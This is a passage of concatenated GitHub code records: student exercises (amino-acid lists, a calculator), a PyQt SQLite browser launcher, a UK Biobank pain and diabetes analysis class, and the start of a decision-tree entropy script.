lstSec\r\n\r\nprint(\"Amino acid sequence after inversion: \\n\", aaList)\r\n\r\n\r\n# 2\r\nprint(\"Answers to question number 2\")\r\nseqArray = []\r\nseq = \"Trp Arg Liu Ilu Asp\"\r\nseqArray = seq.split(\" \")\r\n\r\nprint(seqArray)\r\n\r\nleng = len(seqArray)\r\n\r\nuserInput = int(input(f\"Please give a number between 1 and {leng}: \"))\r\n\r\nif (userInput < 1) or (userInput > len(seqArray)):\r\n print(\"Error: number not in range\")\r\nelse:\r\n print(\"The amino acid at that position is: \", seqArray[userInput-1])\r\nprint(\"\\n\")\r\n\r\n\r\n# 3) Write a program to store the following DNA sequence into an array\r\nprint(\"Answers to question number 3\")\r\n#converting string to an array named seqList\r\n\r\nseq = \"CCGTAACGC\"\r\nseqList = []\r\nfor i in seq:\r\n seqList.append(i)\r\n\r\n# a) Add a T to the end of the array, then print the array.\r\n\r\nseqList.append(\"T\")\r\nprint(seqList)\r\n\r\n# b) Remove the 1st element of the array and print it.\r\n\r\nprint(seqList.pop(0))\r\nprint(seqList)\r\n\r\n# c) Add T to the beginning of the array and print the array.\r\n\r\nseqList.insert(0, \"T\")\r\nprint(seqList)\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"lbushen/Bioinformatics_python","sub_path":"Bushen_A2.py","file_name":"Bushen_A2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27466257275","text":"#program for calculator\r\n# Function to add two numbers\r\ndef add(a, b):\r\n return a + b\r\n\r\n# Function to subtract two numbers\r\ndef subtract(a, b):\r\n return a - b\r\n\r\n# Function to multiply two numbers\r\ndef multiply(a, b):\r\n return a * b\r\n\r\n# Function to mod two numbers\r\ndef mod(a, b):\r\n return a % b\r\n\r\n# Function to divide two numbers\r\ndef divide(a, b):\r\n if b == 0:\r\n print(\"Error: division by zero\")\r\n return None\r\n return a / b\r\n\r\n\r\n\r\n# Main loop for the calculator\r\nwhile True:\r\n print(\"\\nSelect an operation:\")\r\n print(\"1. Add\")\r\n print(\"2. Subtract\")\r\n print(\"3. Multiply\")\r\n print(\"4. Mod\")\r\n print(\"5. Divide\")\r\n print(\"6. Quit\")\r\n choice = input(\"Enter your choice (1-6): \")\r\n if choice == \"1\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = add(a, b)\r\n print(\"Sum: \", result)\r\n elif choice == \"2\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = subtract(a, b)\r\n print(\"Difference: \", result)\r\n elif choice == \"3\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = multiply(a, b)\r\n print(\"Product: \", result)\r\n\r\n elif choice== \"4\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"enter n2: \"))\r\n result = mod(a,b)\r\n print(\"Remainder:\",result)\r\n\r\n elif choice == \"5\":\r\n a = float(input(\"Enter n1: \"))\r\n b = float(input(\"Enter n2: \"))\r\n result = divide(a, b)\r\n if result is not None:\r\n print(\"Quotient: \", result)\r\n \r\n elif choice == \"6\":\r\n print(\"End!\")\r\n break\r\n else:\r\n print(\"Invalid choice!\")\r\n","repo_name":"Deepabs-12/deepabs-training-assignments","sub_path":"Python-Mini Projects/calci.py","file_name":"calci.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31913254920","text":"from windows import amsql_explorer_window\nfrom ui_objects.ui_tab_table import ui_tabTable\nfrom ui_objects.ui_tree_view import UiTreeView\nfrom dialogue_window import DialogueWindow_Warning, DialogueWindow_TextEnter, DialogueWindow_Config, DialogueWindow_Message\n\nfrom actions import Action_OpenDatabase, Action_NewDatabase, Action_TableColumns, Action_TableRows\nfrom actions import Action_updateTableRow, Action_DropTable, Action_RemoveRowsFromTable\nfrom actions import Action_InsertNewRow, Action_OpenTableTabFormTreeItem, Action_OpenTableTabForNewTable\nfrom actions import Action_AddTable\n\ndef noAction(a, b):\n pass\n\nif __name__ == \"__main__\":\n\n import amsql_config # setup config\n import global_config\n import sys\n from PyQt5 import QtWidgets\n import ui_objects.ui_helpers\n\n global_config.GlobalConfig.load_from_file()\n\n # start the QApp\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n main_app = amsql_explorer_window.Ui_MainWindow()\n main_app.setupUi(MainWindow)\n\n ui_objects.ui_helpers.UiHelpers.central_widget = main_app.centralwidget\n\n # Setup message dialog window\n dialog_message = DialogueWindow_Message()\n\n # Add the welcome tab\n main_app.welcome_tab()\n\n # Setup the classes to manage the UI elements :)\n ui_tab_table = ui_tabTable( main_app.tab_view, main_app.statusbar )\n ui_tree_view = UiTreeView(main_app.treeWidget, main_app.statusbar )\n\n # Setup actions\n open_database_action = Action_OpenDatabase(dialog_message, ui_tree_view)\n new_database_action = Action_NewDatabase(dialog_message, ui_tree_view)\n new_table_action = Action_OpenTableTabForNewTable(dialog_message, ui_tree_view, ui_tab_table)\n new_table_save_action = Action_AddTable(dialog_message, ui_tree_view, ui_tab_table )\n drop_table_action = Action_DropTable(dialog_message, ui_tree_view)\n open_table_in_tab_action = Action_OpenTableTabFormTreeItem(dialog_message, ui_tree_view, ui_tab_table)\n\n table_columns_action = Action_TableColumns(dialog_message, ui_tree_view, ui_tab_table)\n table_rows_action = Action_TableRows(dialog_message, ui_tree_view, ui_tab_table)\n table_item_changed_action = Action_updateTableRow(dialog_message)\n table_remove_rows_action = Action_RemoveRowsFromTable(dialog_message, ui_tab_table)\n table_insert_row_action = Action_InsertNewRow(dialog_message, ui_tab_table)\n\n # set actions on ui\n ui_tree_view.add_actions(open_table_in_tab_action)\n ui_tree_view.add_actions(table_columns_action)\n ui_tree_view.add_actions(table_rows_action)\n\n ui_tab_table.add_action(ui_tabTable.TAB_TYPE_TABLE, table_item_changed_action)\n ui_tab_table.add_action(ui_tabTable.TAB_TYPE_NEW_TABLE, new_table_save_action)\n\n # Setup dialogue instances\n dialogs = {}\n\n dialogs[\"drop_table\"] = DialogueWindow_Warning(drop_table_action.run_action) # TODO: update table name in window\n dialogs[\"remove_rows\"] = DialogueWindow_Warning(table_remove_rows_action.run_action) # TODO: update table name in window\n dialogs[\"new_database\"] = DialogueWindow_TextEnter(new_database_action.run_action, \"New database name\")\n dialogs[\"open_database\"] = DialogueWindow_TextEnter(open_database_action.run_action, \"Existing database name\")\n dialogs[\"new_table\"] = DialogueWindow_TextEnter(new_table_action.run_action, \"New table name\")\n\n dialogs[\"config\"] = DialogueWindow_Config()\n\n # setup display values on dialog windows\n dialogs[\"new_database\"].set_standard_buttons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n dialogs[\"new_table\"].set_standard_buttons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n\n # set dict of dialogues in each dialogue instance to prevent multiple windows from being opened\n dialogs[\"drop_table\"].set_dialog_windows(dialogs)\n dialogs[\"remove_rows\"].set_dialog_windows(dialogs)\n dialogs[\"new_database\"].set_dialog_windows(dialogs)\n dialogs[\"open_database\"].set_dialog_windows(dialogs)\n dialogs[\"new_table\"].set_dialog_windows(dialogs)\n dialogs[\"config\"].set_dialog_windows(dialogs)\n\n # bind buttons\n main_app.button_drop_table.clicked.connect(dialogs[\"drop_table\"].new_window)\n main_app.button_new_database.clicked.connect(dialogs[\"new_database\"].new_window)\n main_app.button_open_database.clicked.connect(dialogs[\"open_database\"].new_window)\n main_app.button_remove_row.clicked.connect(dialogs[\"remove_rows\"].new_window)\n main_app.button_add_table.clicked.connect(dialogs[\"new_table\"].new_window)\n main_app.button_add_row.clicked.connect(table_insert_row_action.button_run_action)\n\n # bind 'File' context menu buttons\n main_app.actionShow_Welcome_Screen.triggered.connect(main_app.welcome_tab)\n main_app.actionSettings.triggered.connect(dialogs[\"config\"].new_window)\n main_app.actionQuit.triggered.connect(sys.exit)\n\n # add default db's on start.\n startup_databases = global_config.GlobalConfig.get(\"default_db\").split(\"\\n\")\n for db in startup_databases:\n if not db.isspace() and len(db) > 0:\n open_database_action.run_action( {\"text\": db}, 1 )\n\n # Finally show the window :D\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"Ashley-Sands/SQLightExplorer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31170465221","text":"import os\n\nimport sys\n\n\nsys.path.append(\"../../../ukb-dementia-shap/\")\n\n\nsys.path.append(\"../Pain/code/\")\nfrom logic.data_processing.data_import import dataload\nfrom logic.data_processing.data_processing import data_proc_main\nfrom logic.analysis.analysis import AnalysisCharts\nfrom logic.ml.classification_shap import IDEARs_funcs\nfrom ukb_utils.utils import basic_funcs\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas.tseries.offsets import DateOffset\nimport datetime as dt\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport re\n\nac=dataload()\ndp=data_proc_main()\nml=IDEARs_funcs()\nan=AnalysisCharts()\n\n\n\nclass data_setup():\n\n \"\"\"\n This class is to extract key information from XMLDoc text and return as a set of dataframes\n \"\"\"\n\n def __init__(self) -> None:\n\n self.path_data=\"/Users/michaelallwright/Documents/data/ukb/\"\n self.date_suff=dt.datetime.today().strftime('%Y-%m-%d')\n self.pain_dic=dict({'Not pain-related':'Non Pain','Pain-related - New category \"Arthritis-pain\"':'Arth'})\n self.icd10s=dp.ukb_icd10()\n self.ukb_file='../../data/ukb50790.tab'\n\n #self.field_name_file=pd.read_csv('../../data/ukb_field_names.csv')\n self.field_name_file=pd.read_excel(self.path_data+'metadata/ukb_field_names.xlsx',sheet_name='fieldnames_full')\n #self.field_name_data_dic=pd.read_csv('../../data/data_dic.csv')\n self.field_name_data_dic=pd.read_csv(self.path_data+'metadata/data_dic.csv')\n\n self.field_name_full_file=pd.read_excel(self.path_data+'metadata/ukb_field_names.xlsx',\n sheet_name='fieldnames_full')\n\n self.varmap=dict(zip(self.field_name_full_file[\"col.name\"],self.field_name_full_file[\"Field\"]))\n\n self.code_map=pd.read_csv(self.path_data+'metadata/code_map2.csv')\n\n self.compvars=['glycated_haemoglobin_hba1c_f30750_0_0','cystatin_c_f30720_0_0','neutrophill_count_f30140_0_0',\n 'creactive_protein_f30710_0_0','neutrophill_lymphocyte_ratio','lymphocyte_count_f30120_0_0',\n 'monocyte_count_f30130_0_0','basophill_count_f30160_0_0']\n self.compvars_perc=['neutrophill_percentage_f30200_0_0','lymphocyte_percentage_f30180_0_0',\n 'monocyte_percentage_f30190_0_0','basophill_percentage_f30220_0_0']\n\n #self.varmap=None\n\n def count_nulls(self,df):\n\n # returns a dataframe with the number of nulls and non nulls for each field as well as a list of values and counts\n cols=[]\n non_nulls=[]\n vals_all=[]\n for c in df.columns:\n if c!='eid':\n cols.append(c)\n ns=df[c][pd.notnull(df[c])].shape[0]\n non_nulls.append(ns)\n vals=dict(df[c].value_counts())\n vals_all.append(vals)\n\n df2=pd.DataFrame({'Column':cols,'non_nulls':non_nulls,'vals_all':vals_all})\n df2.sort_values(by='non_nulls',ascending=False,inplace=True)\n return df2\n\n def varnorm_mult(self,df,normvars,bd_var):\n bdowns=list(df[bd_var].unique())\n\n #for i,b in enumerate(bdowns):\n dfs=[df.loc[(df[bd_var]==b),] for b in bdowns]\n df_sums=[pd.DataFrame(df.groupby(normvars).size()).reset_index() for df in dfs]\n\n for i,df in enumerate(df_sums):\n df.columns=normvars+['recs_'+str(i)]\n\n df_out=df_sums[0].copy()\n for i in range(len(bdowns)-1):\n df_out=pd.merge(df_out,df_sums[i+1],on=normvars,how='inner')\n\n return df_out\n\n def agenorm(self,df,var):\n df_sum=pd.DataFrame(df.groupby(['age_when_attended_assessment_centre_f21003_0_0']).agg({var:['mean']})).reset_index()\n df_sum.columns=['age_when_attended_assessment_centre_f21003_0_0','mean'+var]\n\n df=pd.merge(df,df_sum,on='age_when_attended_assessment_centre_f21003_0_0',how='left')\n\n df[var]=df[var].mean()*df[var]/df['mean'+var]\n df.drop(columns=['mean'+var],inplace=True)\n return df\n\n def varnorm1(self,df,normvars,depvar,max_mult=None,delete_df=False):\n\n # rebalances dataframe to be equal across case and control as defined by depvar=1/0 across a list of variables which must be present in the data\n #df1=df.copy()\n\n mask=(df[depvar]==1)\n \n df_case=df.loc[mask,]\n df_ctrl=df.loc[~mask,]\n\n if delete_df:\n del df\n\n\n\n cases=pd.DataFrame(df_case.groupby(normvars).size()).reset_index()\n ctrls=pd.DataFrame(df_ctrl.groupby(normvars).size()).reset_index()\n\n ctrls.columns=normvars+['ctrl_recs']\n cases.columns=normvars+['case_recs']\n ctrl_case=pd.merge(cases,ctrls,on=normvars,how='inner')\n ctrl_case['ratio']=(ctrl_case['ctrl_recs']/ctrl_case['case_recs'])\n \n if max_mult==None:\n max_mult=ctrl_case['ratio'].min()\n\n \n ctrl_case['case_samp']=max_mult\n\n return ctrl_case,df_ctrl,df_case,cases\n\n def varnorm(self,df,normvars,depvar,max_mult=None,delete_df=False):\n\n # rebalances dataframe to be equal across case and control as defined by depvar=1/0 across a list of variables which must be present in the data\n #df1=df.copy()\n\n mask=(df[depvar]==1)\n \n df_case=df.loc[mask,]\n df_ctrl=df.loc[~mask,]\n\n if delete_df:\n del df\n\n\n cases=pd.DataFrame(df_case.groupby(normvars).size()).reset_index()\n ctrls=pd.DataFrame(df_ctrl.groupby(normvars).size()).reset_index()\n\n ctrls.columns=normvars+['ctrl_recs']\n cases.columns=normvars+['case_recs']\n ctrl_case=pd.merge(cases,ctrls,on=normvars,how='inner')\n ctrl_case['ratio']=(ctrl_case['ctrl_recs']/ctrl_case['case_recs'])\n \n if max_mult==None:\n max_mult=ctrl_case['ratio'].min()\n \n ctrl_case['case_samp']=max_mult\n\n\n\n df_ctrl=pd.merge(df_ctrl,ctrl_case,on=normvars)\n\n grouped = df_ctrl.groupby(normvars, group_keys=False)\n df_ctrl=df_ctrl.loc[grouped.apply(lambda x: x.sample((x['case_samp']*x['case_recs']).astype(int).iloc[0])).index,]\n df_ctrl.drop(columns=['ctrl_recs','ratio','case_samp','case_recs'],inplace=True)\n df_out=pd.concat([df_ctrl,df_case],axis=0)\n #df_out=df_out.reset_index()\n \n return df_out\n \n\n def search_icd(self,strings='chronic pain',second_string='',non_strings='xxxxx',string_pat=True):\n mask=(self.icd10s['disease'].str.contains(strings,regex=True))&(~self.icd10s['disease'].str.contains(non_strings,regex=True))&\\\n (self.icd10s['disease'].str.contains(second_string,regex=True))\n icd10_sub=list(self.icd10s.loc[mask,'code'])\n icd_df=self.icd10s.loc[mask,]\n \n if string_pat:\n icd10_sub='|'.join(icd10_sub)\n \n return icd10_sub,icd_df\n\n def sep_path(self,string,i=1):\n try:\n s=string.split('>')[i]\n except:\n s='N/A'\n return s\n\n def map_codes(self):\n code_map=self.code_map.copy()\n code_names=[]\n code_dicts=[]\n for c in code_map['Coding'].unique():\n df1=code_map.loc[code_map['Coding']==c,]\n dict1=dict(zip(df1['Value'],df1['Meaning']))\n code_names.append(c)\n code_dicts.append(dict1)\n code_mappings=pd.DataFrame({'code':code_names,'dicts':code_dicts})\n\n self.code_mappings=code_mappings\n\n return code_mappings\n\n def make_dicts(self):\n field_names=self.field_name_file.copy()\n data_dic=self.field_name_data_dic.copy()\n\n\n field_names['FieldID']=field_names['field.showcase'].astype(str)\n field_names['FieldID']=field_names['field.tab'].apply(lambda x:x.split('.')[1])\n \n data_dic['FieldID']=data_dic['FieldID'].astype(str)\n field_names2=pd.merge(field_names,data_dic,on='FieldID',how='left')\n\n field_names2['Path']=field_names2['Path'].astype(str)\n field_names2['field_type0']=field_names2.apply(lambda x:self.sep_path(x['Path'],0),axis=1)\n field_names2['field_type1']=field_names2.apply(lambda x:self.sep_path(x['Path'],1),axis=1)\n field_names2['field_type2']=field_names2.apply(lambda x:self.sep_path(x['Path'],2),axis=1)\n field_names2['field_type3']=field_names2.apply(lambda x:self.sep_path(x['Path'],3),axis=1)\n\n field_names2.loc[pd.notnull(field_names2['Coding']),'Coding']=\\\n field_names2.loc[pd.notnull(field_names2['Coding']),'Coding'].astype(int)\n\n varmap=dict(zip(field_names['field.tab'],field_names['col.name']))\n\n colsnew=list(field_names.groupby('field.showcase').first()['field.tab'])\n colsnew2=list(field_names.groupby('field.showcase').first()['col.name'])\n\n colsnew_tp1=list(field_names.groupby('field.showcase').nth(1)['field.tab'])\n colsnew2_tp1=list(field_names.groupby('field.showcase').nth(1)['col.name'])\n\n self.varmap=varmap\n self.colsnew=colsnew\n\n dict_maps=dict({'varmap':varmap,'colsnew':colsnew,'colsnew2':colsnew2,'colsnew_tp1':colsnew_tp1,\n 'colsnew2_tp1':colsnew2_tp1,'field_names2':field_names2})\n\n return dict_maps\n\n def make_parquet(self,cols,outfile='df_pain_ukb',parq_out=False):\n\n if self.varmap is None:\n print(\"getting apps time\")\n self.make_dicts()\n\n cols=[c for c in self.colsnew if self.varmap[c] in cols]\n\n df=pd.read_csv(self.ukb_file,sep='\\t',usecols=cols)\n df.columns=[self.varmap[c] for c in df.columns]\n\n if parq_out:\n df.to_parquet('../../data/'+outfile+'.parquet')\n\n return df\n\n def data_clean(self,df,depvar='neuropathy',remwords='xxxxxxx'):\n\n df=ml.col_spec_chars(df=df)\n\n \n df=df.loc[pd.notnull(df[depvar]),]\n\n if depvar=='AD':\n dropvars=list(set([c for c in df.columns if re.search(ml.wordsremoveAD,c)]))\n\n else:\n dropvars=list(set([c for c in df.columns if re.search(ml.wordsremovePD,c)]+\n [c for c in df.columns if re.search(remwords,c)]))\n\n return df,dropvars\n\n\n\n def process_run(self,df,depvar='neuropathy',resize=1,remwords='xxxxxxx',resizeratio=20,runs=2,holdout_ratio=0.5,\n df_val_use=None,preprocess=True,shapshow=2):\n\n df,dropvars=self.data_clean(df,depvar=depvar,remwords=remwords)\n \n shap_tuple=ml.run_entire_data_pd(df=df,drops=dropvars,wordsremove=remwords,outfile='test_pain',savefile=False,\n save_featslist=False,runs=runs,depvar=depvar,agemin=10,agemax=90,resize=resize,holdout_ratio=holdout_ratio,\n resizeratio=resizeratio,verbose=False,df_val_use=df_val_use,preprocess=preprocess,shapshow=2)\n \n return shap_tuple\n\n def ttest(self,df,var,depvar='polyneuropathy'):\n \n df1=df.loc[pd.notnull(df[var]),[var,depvar]]\n ttest_vals=stats.ttest_ind(df1[(df1[depvar]==1)][var],df1[(df1[depvar]==0)][var])\n\n return ttest_vals\n\n def runplots_static(self,df,depvar='poly_chronic',\n fig_name='diabetes_inflamm_polychronicpain',perc=True,compvars=None,agenormvars=[],savefig=True,pltshow=True,\n splitvar='sex_f31_0_0',labels=dict({1:'Female',0:'Male'}),\n normvars=['age_when_attended_assessment_centre_f21003_0_0','sex_f31_0_0']):\n\n df=df.copy()\n if compvars==None:\n\n if perc:\n compvars=self.compvars+self.compvars_perc\n else:\n compvars=self.compvars\n\n for a in agenormvars:\n df=an.varnorm(df,a)\n\n\n \n\n k=len(compvars)\n fig = plt.figure(figsize=(25, 10*k))\n grid = plt.GridSpec(k, 2, hspace=0.45, wspace=0.3)\n\n splitvars=list(set(list(df.loc[pd.notnull(df[splitvar]),splitvar].unique())))\n\n compvars_use=[]\n pvals=[]\n genders=[]\n vals_case=[]\n vals_std_case=[]\n vals_ctrl=[]\n vals_std_ctrl=[]\n\n for j,v in enumerate(compvars):\n for i,x in enumerate(splitvars):\n\n if pltshow:\n ax=fig.add_subplot(grid[j, i])\n\n df_diab2_use=df.loc[df[splitvar]==x,]\n\n \n\n if v in self.varmap:\n title=str(self.varmap[v])\n else:\n title=str(ml.mapvar(v))\n\n\n \n\n pval=str(round(list(self.ttest(df_diab2_use,v,depvar))[1],7))\n rangevars=df_diab2_use[v].quantile(0.75)-df_diab2_use[v].quantile(0.25)\n\n if pltshow:\n ax=sns.boxplot(x=df_diab2_use[depvar],y=df_diab2_use[v],showfliers = False,color='skyblue')\n plt.xticks(fontsize='35')\n plt.yticks(fontsize='35')\n plt.title((title), fontsize='35')\n plt.text(0,rangevars,'p value '+pval,fontsize=24)\n plt.title(labels[x]+'s: '+str(ml.mapvar(v)), fontsize='35')\n\n mask=(df_diab2_use[depvar]==1)\n mean_val_case=df_diab2_use.loc[mask,v].mean()\n std_case=df_diab2_use.loc[mask,v].std()\n std_case=str(round(mean_val_case,2))+' +/- '+str(round(std_case,2))\n mean_val_ctrl=df_diab2_use.loc[~mask,v].mean()\n std_ctrl=df_diab2_use.loc[~mask,v].std()\n std_ctrl=str(round(mean_val_ctrl,2))+' +/- '+str(round(std_ctrl,2))\n\n\n\n compvars_use.append(v)\n genders.append(i)\n pvals.append(pval)\n vals_case.append(mean_val_case)\n vals_ctrl.append(mean_val_ctrl)\n\n vals_std_case.append(std_case)\n vals_std_ctrl.append(std_ctrl)\n\n\n genders=['Male' if c==0 else 'Female' for c in genders]\n compvars_use=[self.varmap[c] if c in self.varmap else ml.mapvar(c) for c in compvars_use]\n\n\n df_out=pd.DataFrame({'Variable':compvars_use,splitvar:genders,'case value':vals_case,'case_vals_std':vals_std_case,\n 'control value':vals_ctrl,'ctrl_vals_std':vals_std_ctrl,'p-value':pvals})\n\n try:\n df_out=df_out.pivot(index='Variable',columns=splitvar,values=['ctrl_vals_std','case_vals_std','p-value'])\n except:\n pass\n\n if savefig:\n plt.savefig(fig_name+'_'+an.date_run+'.jpg', dpi=300,bbox_inches='tight')\n if pltshow:\n plt.show()\n \n return df_out\n\n def pain_base(self,field='troubled_by_pain_or_discomfort_present_for_more_than_3_months_f120019_0_0'):\n df=pd.read_parquet('../../data/df_pain_ukb.parquet')\n mask=(df[field]==1)\n pain1_eids=list(df.loc[mask,'eid'])\n\n return pain1_eids\n\n def basic_diab_df(self):\n icd10_diabs=self.search_icd(strings='diabetes',non_strings='family|screening|insipidus|pregnancy',string_pat=True)[0]\n df_diab=dp.data_merge_dis(remwords='xxxxx',disease='diabetes',icd10s=icd10_diabs,outfile=None,use_icd10=True,\n strcont=True,bef=True,years=0)\n df_diab=df_diab.loc[df_diab['diabetes']==1,]\n\n df_diab.drop(columns=['time_since_diabetes','diabetes'],inplace=True)\n df_diab['NLR']=df_diab['neutrophill_count_f30140_0_0']/df_diab['lymphocyte_count_f30120_0_0']\n\n return df_diab\n\n def basic_df_poly(self,bef=True,years=0,var_time='time_since_diab_poly'):\n\n icd10_diab_poly=self.search_icd(strings='diabetic polyneuropathy',\n non_strings='family|screening|insipidus|pregnancy',string_pat=True)[0]\n\n df_diab_poly=dp.data_merge_dis(remwords='xxxxx',disease='diab_poly',icd10s=icd10_diab_poly,outfile=None,use_icd10=True,\n strcont=True,bef=bef,years=years)[['eid','diab_poly',var_time]]\n\n return df_diab_poly\n\n\n def diabetes_run(self,pain_field='troubled_by_pain_or_discomfort_present_for_more_than_3_months_f120019_0_0'):\n\n #preprocesses diabetes datasets to show polyneuropathy and polyneuropathy with pain at baseline\n\n df_diab=self.basic_diab_df( )\n #diabetic polyneuropathy baseline\n icd10_diab_poly=self.search_icd(strings='diabetic polyneuropathy',\n non_strings='family|screening|insipidus|pregnancy',string_pat=True)[0]\n\n df_diab_poly=dp.data_merge_dis(remwords='xxxxx',disease='diab_poly',icd10s=icd10_diab_poly,outfile=None,use_icd10=True,\n strcont=True,bef=True,years=0)[['eid','diab_poly','time_since_diab_poly']]\n\n df_diab_poly_pros=dp.data_merge_dis(remwords='xxxxx',disease='diab_poly',icd10s=icd10_diab_poly,outfile=None,use_icd10=True,\n strcont=True,bef=False,years=0)[['eid','diab_poly','time_to_diab_poly']]\n\n print('recs prosp diab poly',df_diab_poly_pros.loc[df_diab_poly_pros['diab_poly']==1,].shape[0])\n\n\n eids_diab_poly_base=list(df_diab_poly.loc[df_diab_poly['diab_poly']==1,'eid'].astype(str))\n\n print('num diab poly',len(eids_diab_poly_base))\n\n df_diab['polyneuropathy']=0\n df_diab.loc[df_diab['eid'].isin(eids_diab_poly_base),'polyneuropathy']=1\n\n df_diab_poly_base=df_diab.loc[df_diab['eid'].isin(eids_diab_poly_base),]\n\n\n pain1_eids=self.pain_base(field=pain_field)\n\n mask=df_diab_poly_base['eid'].isin(pain1_eids)\n df_diab_poly_base['poly_pain']=0\n df_diab_poly_base.loc[mask,'poly_pain']=1\n\n return df_diab_poly_base,df_diab\n\n def return_eids(self,df,string='polyneuropathy',icd10s=False,\n string_exc='family|screening|insipidus|pregnancy',years=2):\n \n\n\n df['dis_name_all']=df['disease_name_new']+' '+df['disease_name']\n\n\n if icd10s:\n mask_dis=(df['disease'].str.contains(string,regex=True))\n else:\n mask_dis=(df['dis_name_all'].str.contains(string,regex=True))&(~df['dis_name_all'].str.contains(string_exc,regex=True))\n\n\n\n df['dis']=0\n df.loc[mask_dis,'dis']=1\n\n\n df_cases=df.loc[mask_dis,]\n mask_exc=~(df['eid'].isin(df_cases['eid']))\n df_ctrls=df.loc[mask_exc,]\n\n \n cases=pd.DataFrame(df_cases.groupby(['eid']).agg({'disease_date':'min','date_assess':'min'})).reset_index()\n ctrls=pd.DataFrame(df_ctrls.groupby(['eid']).agg({'disease_date':'min','date_assess':'min','death':'max'})).reset_index()\n\n cases['eid']=cases['eid'].astype(str)\n ctrls['eid']=ctrls['eid'].astype(str)\n\n mask_inc_snap=(cases['disease_date']=cases['date_assess']+ DateOffset(years=years))\n\n cases_inc_pro=list(cases.loc[mask_inc_pro,'eid'].astype(str).unique())\n cases_inc_snap=list(cases.loc[mask_inc_snap,'eid'].astype(str).unique())\n\n cases_exc_pro=list(cases.loc[~mask_inc_pro,'eid'].astype(str).unique())\n cases_exc_snap=list(cases.loc[~mask_inc_snap,'eid'].astype(str).unique())\n \n mask_death=(ctrls['death']==1)\n ctrls_exc_pro=list(ctrls.loc[mask_death,'eid'].astype(str).unique())\n \n #eids to exclude\n eids_exc_snap=cases_exc_snap\n eids_exc_pro=cases_exc_pro+ctrls_exc_pro\n \n disease_list=pd.DataFrame(df.loc[mask_dis,'dis_name_all'].value_counts())\n df_dict=dict({'eids_inc_snap':cases_inc_snap,'eids_inc_pro':cases_inc_pro,'eids_exc_snap':eids_exc_snap,\n 'eids_exc_pro':eids_exc_pro,'disease_list':disease_list,'cases':cases,'ctrl_deaths':ctrls_exc_pro})\n \n \n return df_dict\n\n\n def shapruns(self,run,df,remwords='diabetes|H360|total_dis',depvar='polyneuropathy',resizeratio=5,resize=1,perc=False,\n compvars=None,stream=False,runs=2,holdout_ratio=0.2):\n \n shap_obj=self.process_run(df=df,depvar=depvar,resize=resize,resizeratio=resizeratio,remwords=remwords,runs=runs,\n holdout_ratio=holdout_ratio)\n feats_all=ml.shapgraphs_tuple(shap_obj,max_disp=30,figname='SHAP IDEARS '+run+self.date_suff,stream=stream)\n ml.ROCAUC_tuples(df_out_list=[shap_obj[2]],labels=['IDEARS - all'],cols=['blue'],figname='ROCAUC '+run+self.date_suff,stream=stream)\n self.runplots_static(df=df,depvar=depvar,fig_name='Inflamm boxplots '+run+self.date_suff,perc=perc,compvars=compvars)\n\n return feats_all,shap_obj\n\n def shapruns_new(self,run,df,remwords='diabetes|H360|total_dis',depvar='polyneuropathy',resizeratio=5,resize=1,perc=False,\n compvars=None,stream=False,runs=2,barplots=1,holdout_ratio=0.5,df_val_use=None,preprocess=True):\n \n shap_obj=self.process_run(df=df,depvar=depvar,resize=resize,resizeratio=resizeratio,remwords=remwords,runs=runs,\n holdout_ratio=holdout_ratio,df_val_use=df_val_use,preprocess=preprocess)\n\n print(len(shap_obj))\n feats_all=ml.shapgraphs_tuple(shap_obj,max_disp=30,figname='SHAP IDEARS '+run+self.date_suff,stream=stream)\n aucs=ml.ROCAUC_tuples(df_out_list=[shap_obj[2]],labels=['IDEARS - all'],cols=['blue'],figname='ROCAUC '+run+self.date_suff,stream=stream)\n\n rets=dict({'feats_all':feats_all,'shaps':shap_obj,'aucs':aucs})\n if barplots==1:\n data_sum=self.runplots_static(df=df,depvar=depvar,fig_name='Inflamm boxplots '+run+self.date_suff,perc=perc,compvars=compvars)\n rets['data_sum']=data_sum\n return rets\n\n\n\n\n\n\n\n","repo_name":"binfnstats/idears_orig","sub_path":"logic/data_processing/data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":21165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8047669138","text":"import csv\nimport sys\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import arange, array, ones, linalg, zeros\nfrom collections import Counter\n\ndef hS(mtrx):\n if(mtrx.size != 0 ):\n pos = np.count_nonzero( mtrx[ :, -1] == 1)\n neg = np.count_nonzero( mtrx[ :, -1] == -1)\n if(pos == 0 or neg == 0):\n return 0\n h = (-pos/(pos+neg)) * (math.log( pos/(pos+neg), 2))-(neg/(pos+neg))*(math.log(neg/(pos+neg),2))\n return h\n return 0\n\n\ndef pH(mtrx, parentSize):\n if(mtrx.size != 0 ):\n pos = np.count_nonzero( mtrx[ :, -1] == 1)\n neg = np.count_nonzero( mtrx[ :, -1] == -1)\n if(pos == 0 or neg == 0):\n return 0\n h = (-pos/(pos+neg)) * (math.log( pos/(pos+neg), 2))-(neg/(pos+neg))*(math.log(neg/(pos+neg),2))\n p = (pos+neg)/parentSize\n return (h*p)\n return 0\n\n\ndef iGain(mtrx, feature):\n sortCol = mtrx[mtrx[:,feature].argsort()][:,feature]\n h = hS(mtrx)\n\n bestGain = 0\n 